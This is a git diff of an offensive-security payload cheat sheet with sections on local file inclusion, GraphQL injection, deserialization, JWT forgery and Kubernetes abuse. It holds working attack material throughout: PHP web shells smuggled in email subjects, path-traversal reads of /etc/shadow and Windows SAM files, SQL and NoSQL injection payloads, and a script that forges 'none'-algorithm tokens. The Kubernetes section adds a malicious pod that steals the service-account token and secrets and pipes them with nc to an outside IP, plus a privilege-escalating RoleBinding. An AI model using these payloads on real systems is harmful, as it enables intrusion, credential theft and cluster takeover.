+250 2.1.5 Ok
+data
+354 End data with <CR><LF>.<CR><LF>
+subject: <?php echo system($_GET["cmd"]); ?>
+data2
+.
+```
+
+In some cases you can also send the email with the `mail` command line.
+
+```powershell
+mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
+```
+
 ## LFI to RCE via PHP sessions
 
 Check if the website use PHP Session (PHPSESSID)
@@ -272,7 +351,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
 Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
 ```
 
-In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
+In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/session/sess_[PHPSESSID] files
 
 ```javascript
 /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
@@ -291,6 +370,31 @@ Use the LFI to include the PHP session file
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
 
+## LFI to RCE via credentials files
+
+This method require high privileges inside the application in order to read the sensitive files.
+
+### Windows version
+
+First extract `sam` and `system` files.
+
+```powershell
+http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
+http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
+```
+
+Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
+
+### Linux version
+
+First extract `/etc/shadow` files.
+
+```powershell
+http://example.com/index.php?page=../../../../../../etc/shadow
+```
+
+Then crack the hashes inside in order to login via SSH on the machine.
+
 ## References
 
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
@@ -307,4 +411,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
\ No newline at end of file
+* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
diff --git a/GraphQL Injection/Images/htb-help.png b/GraphQL Injection/Images/htb-help.png
new file mode 100644
index 00000000..5b0493be
Binary files /dev/null and b/GraphQL Injection/Images/htb-help.png differ
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index f7b0a758..12734ff6 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -1,23 +1,63 @@
 # GraphQL injection
 
-> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
+> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
+
+
+## Summary
+
+* [Tools](#tools)
+* [Exploit](#exploit)
+  * [Identify an injection point](#identify-an-injection-point)
+  * [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
+  * [Extract data](#extract-data)
+  * [Extract data using edges/nodes](#extract-data-using-edges-nodes)
+  * [Extract data using projections](#extract-data-using-projections)
+  * [Enumerate the types' definition](#enumerate-the-type-definition)
+  * [Use mutations](#use-mutations)
+  * [NOSQL injection](#nosql-injection)
+  * [SQL injection](#sql-injection)
+  * [GraphQL Batching Attacks](#graphql-batching-attacks)
+* [References](#references)
+
+## Tools
+
+* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
+* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
+* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
+* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
+* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
+* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
+* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
 
 ## Exploit
 
-Identify an injection point
+### Identify an injection point
 
-```javascript
-?param={__schema{types{name}}}
-```
-Check if errors are visible
+Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
 
-```javascript
-?param={__schema}
-?param={}
-?param={thisdefinitelydoesnotexist}
+```js
+example.com/graphql?query={__schema{types{name}}}
+example.com/graphiql?query={__schema{types{name}}}
 ```
 
-Enumerate Database Schema with the following GraphQL query
+Check if errors are visible.
+
+```javascript
+?query={__schema}
+?query={}
+?query={thisdefinitelydoesnotexist}
+```
+
+
+### Enumerate Database Schema via Introspection
+
+URL encoded query to dump the database schema.
+
+```js
+fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
+```
+
+URL decoded query to dump the database schema.
 
 ```javascript
 fragment FullType on __Type {
@@ -114,17 +154,165 @@ query IntrospectionQuery {
     }
   }
 }
-
 ```
 
+### List path
+
+```php
+$ git clone https://gitlab.com/dee-see/graphql-path-enum
+$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
+Found 27 ways to reach the "Skill" node from the "Query" node:
+- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (skills) -> Skill
+```
+
+### Extract data
+
+```js
+example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
+```
+
+![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
+
+
+
+### Extract data using edges/nodes
+
+```json
+{
+  "query": "query {
+    teams{
+      total_count,edges{
+        node{
+          id,_id,about,handle,state
+        }
+      }
+    }
+  }"
+} 
+```
+
+### Extract data using projections
+
+:warning: Don’t forget to escape the " inside the **options**.
+
+```json
+{doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
+```
+
+
+### Enumerate the types' definition 
+
 Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
 
 ```javascript
 {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
 ```
 
+### Use mutations
+
+Mutations work like function, you can use them to interact with the GraphQL.
+
+```javascript
+# mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
+# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
+```
+
+### NOSQL injection
+
+Use `$regex`, `$ne` from []() inside a `search` parameter.
+
+```json
+{
+  doctors(
+    options: "{\"limit\": 1, \"patients.ssn\" :1}", 
+    search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
+    {
+      firstName lastName id patients{ssn}
+    }
+}
+```
+
+
+### SQL injection
+
+Send a single inside a graphql parameter to trigger the SQL injection
+
+```powershell
+{ 
+    bacon(id: "1'") { 
+        id, 
+        type, 
+        price
+    }
+}
+```
+
+Simple SQL injection inside a graphql field.
+
+```powershell
+curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
+```
+
+### GraphQL Batching Attacks
+
+Common scenario:
+* Password Brute-force Amplification Scenario
+* 2FA bypassing
+
+```powershell
+mutation finishChannelVerificationMutation(
+  $input FinishChannelVerificationInput!,
+  $input2 FinishChannelVerificationInput!,
+  $input3 FinishChannelVerificationInput!,
+){
+  first: finishChannelVerificationMutation(input: $input){
+    channel{
+      id
+      option{
+        ... onChannelSmsOptions{
+          number
+        }
+      }
+      status
+      notificationSubscription(last: 1000){ etc...  }
+    }
+  }
+
+
+  second: finishChannelVerificationMutation(input: $input2){...}
+  third: finishChannelVerificationMutation(input: $input3){...}
+}
+```
+
+
 ## References
 
 * [Introduction to GraphQL](https://graphql.org/learn/)
 * [GraphQL Introspection](https://graphql.org/learn/introspection/)
-
+* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
+* [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](https://labs.detectify.com/2018/03/14/graphql-abuse/)
+* [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
+* [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
+* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
+* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
+* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
+* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
+* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
+* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
+* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
+* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md
index f3606d14..59156880 100644
--- a/Insecure Deserialization/Java.md	
+++ b/Insecure Deserialization/Java.md	
@@ -63,10 +63,12 @@ JRE8u20_RCE_Gadget
 
 JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
 
+ysoserial-modified [https://github.com/pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified)
+
 ## References
 
 - [Github - ysoserial](https://github.com/frohoff/ysoserial)
 - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
-- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
\ No newline at end of file
+- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md
index da38348d..a0821103 100644
--- a/Insecure Deserialization/PHP.md	
+++ b/Insecure Deserialization/PHP.md	
@@ -99,7 +99,7 @@ if($obj) {
 Payload:
 
 ```php
-O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
+O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
 ```
 
 ## Others exploits
diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md
index 4a0ed0fb..514fd13e 100644
--- a/Insecure Deserialization/README.md	
+++ b/Insecure Deserialization/README.md	
@@ -12,6 +12,7 @@ Check the following sub-sections, located in other files :
 ## References
 
 * [Github - ysoserial](https://github.com/frohoff/ysoserial)
+* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
@@ -24,4 +25,6 @@ Check the following sub-sections, located in other files :
 * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
 * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 
 * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
-* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
\ No newline at end of file
+* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
+* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
+* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
index 6daf3b54..0e947495 100644
--- a/Insecure Source Code Management/README.md	
+++ b/Insecure Source Code Management/README.md	
@@ -2,6 +2,7 @@
 
 - [GIT - Source code management](#git---source-code-management)
   - [Github example with a .git](#github-example-with-a-git)
+  - [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
   - [Automatic way : diggit.py](#automatic-way--diggitpy)
   - [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
   - [Automatic way : rip-git](#automatic-way--rip-git)
diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index 3e88b887..e1862992 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -4,10 +4,15 @@
 
 ## Summary 
 
-- JWT Format
-- JWT Signature - None algorithm
-- JWT Signature - RS256 to HS256
-- Breaking JWT's secret
+- [Tools](#tools)
+- [JWT Format](#jwt-format)
+- [JWT Signature - None algorithm](#jwt-signature---none-algorithm)
+- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256)
+- [Breaking JWT's secret](#breaking-jwts-secret)
+    - [JWT Tool](#jwt-tool)
+    - [JWT cracker](#jwt-cracker)
+    - [Hashcat](#hashcat)
+- [References](#references)
 
 ## Tools
 
@@ -41,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 }
 ```
 
+| `alg` Param Value  | Digital Signature or MAC Algorithm | Requirements |
+|---|---|---|
+| HS256 | HMAC using SHA-256                             | Required  |
+| HS384 | HMAC using SHA-384                             | Optional  |
+| HS512 | HMAC using SHA-512                             | Optional  |
+| RS256	| RSASSA-PKCS1-v1_5 using SHA-256                | Recommended | 
+| RS384 | RSASSA-PKCS1-v1_5 using SHA-384                |	Optional | 
+| RS512 | RSASSA-PKCS1-v1_5 using SHA-512                |	Optional | 
+| ES256 | ECDSA using P-256 and SHA-256	                 | Recommended  | 
+| ES384 | ECDSA using P-384 and SHA-384                  | Optional     | 
+| ES512 | ECDSA using P-521 and SHA-512	                 | Optional     | 
+| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 |	Optional | 
+| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 |	Optional |
+| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 |	Optional |
+| none	| No digital signature or MAC performed          |	Required |
+ 
+
+
 ### Payload
 
 ```json
@@ -67,41 +90,35 @@ JWT Encoder – Decoder: `http://jsonwebtoken.io`
 
 JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
 
+None algorithm variants:
+* none 
+* None
+* NONE
+* nOnE
+
 To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT.
 
 However, this won't work unless you **remove** the signature
 
-The following code is a basic test for a None algorithm.
-
-```python
-import jwt
-import base64
-
-def b64urlencode(data):
-    return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
-
-print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
-    '.' + b64urlencode("{\"data\":\"test\"}") + '.'
-```
-
 Alternatively you can modify an existing JWT (be careful with the expiration time)
 
-```python
-#!/usr/bin/python
+```python3
+#!/usr/bin/python3
 # -*- coding: utf-8 -*-
 
-jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
-header, payload, signature  = jwt.split('.')
+import jwt
 
-# Replacing the ALGO and the payload username
-header  = header.decode('base64').replace('HS256',"none")
-payload = (payload+"==").decode('base64').replace('test','admin')
+jwtToken 	= 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
 
-header  = header.encode('base64').strip().replace("=","")
-payload = payload.encode('base64').strip().replace("=","")
+decodedToken 	= jwt.decode(jwtToken, verify=False)  					# Need to decode the token before encoding with type 'None'
+noneEncoded 	= jwt.encode(decodedToken, key='', algorithm=None)
 
-# 'The algorithm 'none' is not supported'
-print( header+"."+payload+".")
+print(noneEncoded.decode())
+
+"""
+Output:
+eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.
+"""
 ```
 
 ## JWT Signature - RS256 to HS256
@@ -118,9 +135,37 @@ print public
 print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
 ```
 
-Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version
+:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`.
 
-`pip install pyjwt==0.4.3`.
+Here are the steps to edit an RS256 JWT token into an HS256
+
+1. Convert our public key (key.pem) into HEX with this command.
+
+    ```powershell
+    $ cat key.pem | xxd -p | tr -d "\\n"
+    2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
+    ```
+
+2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited.
+
+    ```powershell
+    $ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
+
+    (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0
+    ```
+
+3. Convert signature (Hex to "base64 URL")
+
+    ```powershell
+    $ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")"
+    ```
+
+4. Add signature to edited payload
+
+    ```powershell
+    [HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE]
+    eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA
+    ```
 
 ## Breaking JWT's secret
 
@@ -211,7 +256,7 @@ Secret is "Sn1f"
 
 ### Hashcat
 
-> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
+> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
 
 ```bash
 /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
@@ -231,4 +276,7 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
-- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
\ No newline at end of file
+- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
+- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
+- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
+- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
\ No newline at end of file
diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md
new file mode 100644
index 00000000..984d6215
--- /dev/null
+++ b/Kubernetes/readme.md
@@ -0,0 +1,202 @@
+# Kubernetes
+
+> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
+
+## Summary 
+
+- [Tools](#tools)
+- [RBAC Configuration](#rbac-configuration)
+    - [Listing Secrets](#listing-secrets)
+    - [Access Any Resource or Verb](#access-any-resource-or-verb)
+    - [Pod Creation](#pod-creation)
+    - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
+    - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
+    - [Impersonating a Privileged Account](#impersonating-a-privileged-account)
+- [Privileged Service Account Token](#privileged-service-account-token)
+- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
+- [API addresses that you should know](#api-adresses-that-you-should-know)
+- [References](#references)
+
+## Tools
+
+* [kubeaudit](https://github.com/Shopify/kubeaudit). kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: run the container as a non-root user, use a read only root filesystem, drop scary capabilities, don't add new ones, don't run privileged, ...
+* [kubesec.io](https://kubesec.io/). Security risk analysis for Kubernetes resources.
+* [kube-bench](https://github.com/aquasecurity/kube-bench). kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/).
+
+* [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios.
+
+## Service Token
+
+> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod.
+
+```powershell
+$ cat /var/run/secrets/kubernetes.io/serviceaccount
+
+# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting
+```
+
+## RBAC Configuration
+
+### Listing Secrets
+
+An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
+
+```powershell
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
+```
+
+### Access Any Resource or Verb
+
+```powershell
+resources:
+- '*'
+verbs:
+- '*'
+```
+
+### Pod Creation
+
+Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
+Then create a malicious pod.yaml file.
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: alpine
+  namespace: kube-system
+spec:
+  containers:
+  - name: alpine
+    image: alpine
+    command: ["/bin/sh"]
+    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
+  serviceAccountName: bootstrap-signer
+  automountServiceAccountToken: true
+  hostNetwork: true
+```
+
+Then `kubectl apply -f malicious-pod.yaml`
+
+### Privilege to Use Pods/Exec
+
+```powershell
+kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh
+```
+
+### Privilege to Get/Patch Rolebindings
+
+The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. 
+Create a malicious RoleBinging.json file.
+
+```powershell
+{
+    "apiVersion": "rbac.authorization.k8s.io/v1",
+    "kind": "RoleBinding",
+    "metadata": {
+        "name": "malicious-rolebinding",
+        "namespcaes": "default"
+    },
+    "roleRef": {
+        "apiGroup": "*",
+        "kind": "ClusterRole",
